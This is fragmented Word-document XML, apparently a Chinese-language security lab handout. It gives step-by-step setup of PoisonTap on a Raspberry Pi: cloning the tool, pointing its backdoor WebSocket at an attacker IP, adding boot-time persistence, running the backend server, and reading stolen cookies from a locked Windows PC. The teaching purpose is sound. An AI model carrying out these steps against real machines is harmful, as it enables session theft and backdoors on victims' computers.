          <w:numId w:val="31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安裝需要的檔案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AAD60A" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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apt-get -y install git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tmux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vim telnet iptables screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E219B8" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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下載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github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77018ABF" w14:textId="77777777" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="006123A9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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone https://github.com/samyk/poisontap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134B89A" w14:textId="77777777" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1875"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:leftChars="500" w:left="120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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cd poisontap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988F9B5" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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修改目標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IP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至檔案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(backdoor.html</w:t>
      </w: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及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target_backdoor.js)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E070B0" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32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var socket = new WebSocket('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ws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://&lt;IP&gt;:1337’);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B500B46" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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>編輯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install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD2F4E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lastRenderedPageBreak/>
        <w:t>echo -e "\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nauto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usb0\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nallow-hotplug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usb0\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niface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usb0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inet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static\n\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taddress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1.0.0.1\n\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tnetmask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0.0.0.0" &gt;&gt;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/network/interfaces </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CA9FD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echo "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dtoverlay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=dwc2" &gt;&gt; /boot/config.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3222E7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echo -e "dwc2\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ng_ether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" &gt;&gt;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/modules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171E982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sed --in-place "/exit 0/d"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rc.local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3A180827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echo "/bin/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sh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/home/pi/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poisontap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/pi_startup.sh" &gt;&gt;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rc.local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46FD979C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mkdir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/home/pi/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poisontap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09AE148A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chown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-R pi /home/pi/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poisontap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7656B5F1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apt-get update &amp;&amp; apt-get upgrade </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EC726" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="187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apt-get -y install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isc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-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dhcp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-server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dsniff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screen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nodejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B7AEC86" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="187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執行</w:t>
      </w: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install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7C42F" w14:textId="5715AFF8" w:rsidR="0006478A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ab/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bash install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848D484" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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編輯</w:t>
      </w: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pi_startup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D0DA66E" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34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將 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls /sys/class/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udc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&gt; UDC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB69D47" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34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kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">改成 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBCAC66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700" w:left="168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name="$(ls /sys/class/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udc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)" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E856B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700" w:left="168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echo "$name" &gt;UDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C134D7" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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設定</w:t>
      </w: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dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2614BCDA" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35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cp -f 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dhcpd.conf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dhcp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dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="049DB923" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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編輯</w:t>
      </w:r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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rc.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，將原本中間的刪除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D42133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... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A5ED2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# Print the IP address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E46818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7A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/pi/poisontap/pi_startup.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760CB174" w14:textId="45125883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server</w:t>
      </w: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端設定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B86B13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請使用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LAB2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給大家的帳號</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F074BE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查詢版本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(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uname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-m)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，至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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://nodejs.org/en/download/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rStyle w:val="a8"/>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://nodejs.org/en/download/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fldChar w:fldCharType="end"/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下載對應版本，在對應的按鈕右鍵複製連結網址，從該網址下載</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB89BE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wget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https://nodejs.org/dist/v16.15.0/node-v16.15.0-linux-armv7l.tar.xz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A02D5D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解壓縮檔案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF945D7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>tar -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xf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node-v16.15.0-linux-armv7l.tar.xz cd node-v16.15.0-linux-armv7l/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F92916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lastRenderedPageBreak/>
        <w:t>複製檔案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA24FB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cp -R * /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usr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/local/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5991EB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更新版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FAAF4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 w:val="32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npm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install -g npm@8.10.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9E08C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下載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websocket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0458056C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npm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install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websocket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3FD4BA4E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下載需要的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package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFC2A67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apt-get install git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF38770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>git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檔案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F9B3F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git clone https://github.com/samyk/poisontap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75138544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移動到資料夾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC898D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cd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poisontap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7565A5D5" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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背景執行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backend_server.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5797E4BF" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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node backend_server.js &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F63B3" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36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若是說已經使用可使用以下指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10D4F2" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD331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1000" w:left="240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lsof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-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i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:1337 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C618C3" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD331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1000" w:left="2400"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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sudo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kill -9 {PID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA851C" w14:textId="3A011146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設定</w:t>
      </w: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WIN 10 RNDIS IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBC149" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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這邊要將電腦使用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DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2C8DE" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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開始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(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)→設定→網路及網際網路→變更介面卡選項→USB Ethernet/RNDIS Gadget Interface (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右鍵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) → IPv4 →內容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B109ABA" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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設定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IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470CC69C" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38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自動存取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DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56007DF9" w14:textId="6CB1BB4C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  <w:t>Demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644EE461" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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將電腦上鎖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C470A" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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>WIN+L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E1065" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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將電腦與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raspberry pi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連接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7AA49" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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開啟一個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http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網站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3CAA2E" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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例如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: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00AD3318">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://211.22.104.114</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B59839F" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr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可再次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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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去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raspberry pi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141B4D98" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD331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cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>poisontap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD3318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p w14:paraId="767C8A18" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="915"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:leftChars="400" w:left="960"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat poisontap.cookies.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7483C4B1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lastRenderedPageBreak/>
        <w:t>檢核點：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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截圖</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w: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網站及</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58"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  <w:t>檔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7"/>
        <w:gridCol w:w="4279"/>
      </w:tblGrid>
      <w:tr w:rsidR="006123A9" w:rsidRPr="007A4F58" w14:paraId="205007EB" w14:textId="77777777" w:rsidTr="006123A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4027" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0114EAF2" w14:textId="183AC992" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="915"/>
              </w:tabs>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="240" w:lineRule="atLeast"/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24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A4F58">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2253AC06" wp14:editId="7E234FDC">
                  <wp:extent cx="2447925" cy="2489719"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="6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5D4EF5-4A58-41ED-9D66-F3084D1A54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6C5D4EF5-4A58-41ED-9D66-F3084D1A54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02" cy="252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1A85F68C" w14:textId="217E4C73" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="915"/>
              </w:tabs>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="240" w:lineRule="atLeast"/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24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A4F58">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0547A3E9" wp14:editId="107D6C03">
                  <wp:extent cx="2603298" cy="2457450"/>
                  <wp:effectExtent l="0" t="0" r="6985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7B4B09-851D-4247-8F31-5C08854781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CD7B4B09-851D-4247-8F31-5C0885478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356" cy="247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B4E03" w14:textId="61E60E94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bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4F58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24"/>
        </w:rPr>
        <w:t>參考資料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE261B4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17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https://www.ubuntu-tw.org/modules/newbb/viewtopic.php?topic_id=105922</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73CB2BBA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18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https://blog.csdn.net/qq_28208251/article/details/48115815</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="545969A4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19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https://www.86duino.com/?p=15623&amp;lang=TW</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0536A826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20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https://www.aircrack-ng.org/doku.php?id=airmon-ng#error_adding_monitor_mode_interfacecommand_failedoperation_not_supported_-95</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CDD7F0A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21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https://github.com/samyk/poisontap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="785F762D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22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https://www.security-sleuth.com/sleuth-blog/2017/3/6/installing-poison-tap-for-dummies-the-most-complete-guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01458A7F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hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="007A4F58">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
            <w:b/>
            <w:kern w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=dYDa_VDbjPY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63DEDE36" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/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/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">802.11® Wireless Networks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Definitive Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA2EEA" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="915"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006123A9" w:rsidRPr="007A4F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59F33" w14:textId="77777777" w:rsidR="002A579E" w:rsidRDefault="002A579E" w:rsidP="00624743">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="371F8B24" w14:textId="77777777" w:rsidR="002A579E" w:rsidRDefault="002A579E" w:rsidP="00624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7FD68" w14:textId="77777777" w:rsidR="002A579E" w:rsidRDefault="002A579E" w:rsidP="00624743">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
